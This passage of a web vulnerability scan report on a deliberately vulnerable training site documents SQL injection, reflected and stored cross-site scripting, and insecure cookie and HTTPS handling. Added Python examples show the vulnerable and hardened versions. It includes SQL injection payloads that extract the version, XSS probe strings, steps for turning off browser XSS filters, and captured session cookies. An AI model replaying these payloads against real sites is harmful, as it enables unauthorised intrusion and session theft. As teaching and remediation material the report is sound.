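ALLOWED_ORDER = {"name": "Name ASC", "votes": "Votes DESC", "id": "Id ASC"}


def list_ids_hardened(orderby):
    """Same query, but the user's value only selects an entry from ALLOWED_ORDER."""
    try:
        clause = ALLOWED_ORDER[orderby.strip().lower()]
    except KeyError:
        # Reject rather than fall back silently; log the attempt in real code.
        raise ValueError(f"unsupported sort key: {orderby!r}") from None
    conn = _connect()
    return [row[0] for row in conn.execute(f"SELECT Id FROM Supercar ORDER BY {clause}")]


if __name__ == "__main__":
    true_probe = order_oracle("substr(sqlite_version(), 1, 1) = '3'")
    false_probe = order_oracle("substr(sqlite_version(), 1, 1) = '9'")
    print("condition true :", list_ids_vulnerable(true_probe))   # sorted by Name
    print("condition false:", list_ids_vulnerable(false_probe))  # sorted by Votes
    print("hardened, name :", list_ids_hardened("name"))
    try:
        list_ids_hardened(true_probe)
    except ValueError as exc:
        print("hardened rejects probe:", exc)
```

The allow-list keys are what the application exposes in links and drop-downs; the SQL fragments they map to never leave the server, so there is nothing for the orderby parameter to smuggle in.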
1 TOTAL (IMPORTANT), 1 CONFIRMED
3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this limits the direct impact to hijacking other users' sessions, an attacker might target an administrator and thereby gain full control over the application.

Impact: There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking users' active sessions
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks

Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then the output needs to be encoded as a JavaScript string literal, not merely HTML-encoded. Encoding rules differ per context and are easy to get wrong, so it is strongly recommended to use an encoding library such as OWASP ESAPI or the Microsoft Anti-XSS Library.

Remedy References: Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling

Proof of Concept Notes: The generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering in different browsers. Also note that XSS filtering is a feature that is enabled by default in some modern browsers. It should only be disabled temporarily to test exploits and should be reverted if the browser is used for anything other than testing. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism; therefore a web application should not rely on this kind of client-side browser check. (The responses recorded in this report already carry an X-XSS-Protection: 0 header, which switches the Internet Explorer and Chrome filters off for this site.)

Chrome
Open a command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor

Internet Explorer
Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to Disabled. Click OK. Click Yes to accept the warning, followed by Apply.

Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double-clicking the row.

Classification: OWASP 2010-A2; OWASP 2013-A3; PCI V2.0-6.5.7; PCI V3.0-6.5.7; CWE-79; CAPEC-19; WASC-08
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'

Parameters
Parameter   Type  Value
searchTerm  GET   '+netsparker(9)+'

Request
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr /><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
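The response above reflects searchTerm twice: once as text inside the span and once, unencoded, inside a single-quoted JavaScript string in a script block. The probe '+netsparker(9)+' closes that string, concatenates a function call and reopens it, which is why HTML encoding alone would not have helped here. The following Python is an added example, not code from the report or the site; it assumes the markup shown in the response (the exact Razor view is not in the report) and shows the same fragment rendered with and without context-specific encoding.

```python
import html
import json

# The probe reflected in 3.1; a real payload would be '+alert(document.cookie)+'
PROBE = "'+netsparker(9)+'"


def render_vulnerable(term):
    """Reproduces the two reflection points seen in the /Search response.

    Assumed markup: the value lands in an HTML text node and, unencoded, inside
    a single-quoted JavaScript string literal.
    """
    return (
        f'<h2>You searched for "<span id="searchTerm">{term}</span>"</h2>\n'
        f"<script>$('#searchTerm').val('{term}');</script>"
    )


def js_string_literal(value):
    """Encode `value` as a JavaScript string literal that is safe inside <script>.

    json.dumps escapes quotes, backslashes and control characters; the extra
    replacements stop the literal from terminating the script block or opening
    an HTML comment, which JSON encoding alone does not prevent.
    """
    return json.dumps(value).replace("</", "<\\/").replace("<!--", "<\\!--")


def render_hardened(term):
    """Encode for each context: HTML entities for the text node, a JS string
    literal for the script block."""
    return (
        f'<h2>You searched for "<span id="searchTerm">{html.escape(term, quote=True)}</span>"</h2>\n'
        f"<script>$('#searchTerm').val({js_string_literal(term)});</script>"
    )


def probe_executes(rendered):
    """True when the probe ended up as a bare JS expression: ''+netsparker(9)+''."""
    return ".val(''+netsparker(9)+'')" in rendered


if __name__ == "__main__":
    print(render_vulnerable(PROBE))
    print("vulnerable executes probe:", probe_executes(render_vulnerable(PROBE)))
    print(render_hardened(PROBE))
    print("hardened executes probe:", probe_executes(render_hardened(PROBE)))
```

In an ASP.NET MVC view the equivalent is leaving Razor's default HTML encoding in place for the span and emitting the script value through a JavaScript-string encoder (for example the Anti-XSS library's JavaScriptStringEncode) rather than Html.Raw.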
1 TOTAL (IMPORTANT), 1 CONFIRMED
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of the injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. This happens because input entered by the user has been interpreted as HTML/JavaScript/VBScript by the browser.
Permanent means that the attack payload is stored in the back-end system. In reflected XSS attacks an attacker needs to deliver a link to the victim, for example by e-mail, but with permanent XSS the attacker can simply plant the payload and wait for users to visit the affected page. As soon as someone visits the page, the attacker's stored payload will be executed.
XSS targets the users of the application instead of the server. Although this limits the direct impact to hijacking other users' sessions, the attacker might target an administrator and thereby gain full control over the application.

Impact: Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application
- The website can be redirected to a new location, defaced or used as a phishing site

Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output must be encoded for the context it is written into (HTML body, attribute, JavaScript string, URL), and input should be validated on the way in. Where the output is HTML, ensure all active content is removed or encoded before it is returned to the browser.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input. Input validation is defence in depth; it does not replace output encoding.
There are a number of pre-defined, well-structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.

Remedy References: [ASP.NET] Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2; OWASP 2013-A3; PCI V2.0-6.5.7; PCI V3.0-6.5.7; CWE-79; CAPEC-19; WASC-08
4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
1 TOTAL (IMPORTANT), 1 CONFIRMED
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.

Impact: If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take:
1. See the remedy for the solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS and should post to HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9; OWASP 2013-A6; PCI V2.0-6.5.4; PCI V3.0-6.5.4; CWE-319; CAPEC-65; WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register

Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Register - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head>
<body>
<header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1 TOTAL (IMPORTANT), 1 CONFIRMED
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure and transmitted over HTTPS.
Without the Secure attribute the browser will also send this cookie on plain HTTP requests to the same host, so an attacker who can observe traffic, or who can trick the victim's browser into making one HTTP request to the site, obtains it without having to break TLS.

Impact: This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack the victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.

Actions to Take:
1. See the remedy for the solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy: Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation: To exploit this issue the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.

External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9; OWASP 2013-A6; PCI V2.0-6.5.4; PCI V3.0-6.5.4; CWE-614; CAPEC-102; WASC-15
6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie

Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2>
</body></html>
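The login response above sets three cookies that persist for a year, none of them with Secure or HttpOnly, and then redirects the browser to an http:// URL, which is exactly the plain-HTTP request on which they leak. One of them, Password=Mw==, is the base64 encoding of the password submitted in the same request (Password=3). The script below is an added example, not code from the report or the site: it parses Set-Cookie values as a scanner would, raises the findings this report raises for them, and builds the hardened header the remedy asks for. The cookie strings are taken from 6.1 with the AuthCookie value shortened.

```python
import base64

# Constructed from the Set-Cookie values in 6.1 (AuthCookie value shortened here);
# the login POST that produced them carried Password=3.
LOGIN_RESPONSE_COOKIES = [
    "AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
]


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    first, *rest = [part.strip() for part in header_value.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        key, has_value, val = part.partition("=")
        # Flag attributes such as Secure and HttpOnly carry no value; store True.
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value, attrs


def audit_set_cookie(header_value):
    """Return (cookie name, findings) for one Set-Cookie header."""
    name, value, attrs = parse_set_cookie(header_value)
    findings = []
    if "secure" not in attrs:
        findings.append("not marked Secure")
    if "httponly" not in attrs:
        findings.append("not marked HttpOnly")
    if name.lower() == "password":
        # A credential in a cookie is a finding on its own; decode it when it is
        # plain base64, as it is in this report.
        try:
            plain = base64.b64decode(value, validate=True).decode()
            findings.append(f"credential stored client-side (decodes to {plain!r})")
        except (ValueError, UnicodeDecodeError):
            findings.append("credential stored client-side")
    return name, findings


def harden_set_cookie(name, value, max_age=None):
    """Build a Set-Cookie value with the attributes the remedy asks for.

    SameSite=Lax is an addition beyond this 2014 report; it is what a current
    browser expects on an authentication cookie.
    """
    parts = [f"{name}={value}", "Path=/", "Secure", "HttpOnly", "SameSite=Lax"]
    if max_age is not None:
        parts.append(f"Max-Age={max_age}")
    return "; ".join(parts)


if __name__ == "__main__":
    for raw in LOGIN_RESPONSE_COOKIES:
        print(audit_set_cookie(raw))
    print(harden_set_cookie("AuthCookie", "<opaque ticket>", max_age=1200))
```

The Password and Email cookies have no legitimate reason to exist at all; the hardened builder is only for the authentication ticket, and the remedy for the other two is to stop setting them.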
1 TOTAL (IMPORTANT)
7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified that you are using an out-of-date version of Microsoft SQL Server.

Impact: Since this is an old version of the software, it may be vulnerable to known attacks.

Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version. Note that the version banner extracted through the same orderby injection identifies the engine as Microsoft SQL Azure (RTM), a Microsoft-managed service whose engine version is patched by Microsoft rather than chosen by the tenant; check the service's own patch status before treating this comparison against the boxed product as actionable.

Classification: OWASP 2010-A6; OWASP 2013-A9; PCI V2.0-6.1; PCI V3.0-6.1; CAPEC-310
7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty:

Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
    <head>
        <title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
        <meta name="viewport" content="width=device-width" />
        <style>
         body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
         p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
         b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
         H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
         H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
         pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
         .marker {font-weight: bold; color: black;text-decoration: none;}
         .version {color: gray;}
         .error {margin-bottom: 10px;}
         .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
         @media screen and (max-width: 639px) {
          pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
         }
         @media screen and (max-width: 479px) {
          pre { width: 280px; }
         }
        </style>
    </head>

    <body bgcolor="white">
            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
            <h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
            <b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
1 TOTAL (MEDIUM), 1 CONFIRMED
8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.

Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or by changing the form's action, in order to steal the user's password. Even though the form posts to an HTTPS target, this does not protect the system against man-in-the-middle attacks, because the page carrying the form can be rewritten in transit before the form is ever submitted.
This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take:
1. See the remedy for the solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9; OWASP 2013-A6; PCI V2.0-6.5.4; PCI V3.0-6.5.4; CWE-319; CAPEC-65; WASC-04
8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login

Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Log in - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head>
<body>
<header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
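Findings 5.1 and 8.1 are two sides of one check: where is the page carrying the password field served from, and where does the form post to. The register form is served over HTTP and posts to http://, the login form is served over HTTP and posts to https://. The following Python is an added example, not code from the report or the site; it walks a page's forms with the standard-library HTML parser and raises the two findings from the page URL and each form's resolved action. The two sample pages are constructed to match the URLs and form actions recorded in 5.1 and 8.1 (the report does not reproduce the form markup itself).

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


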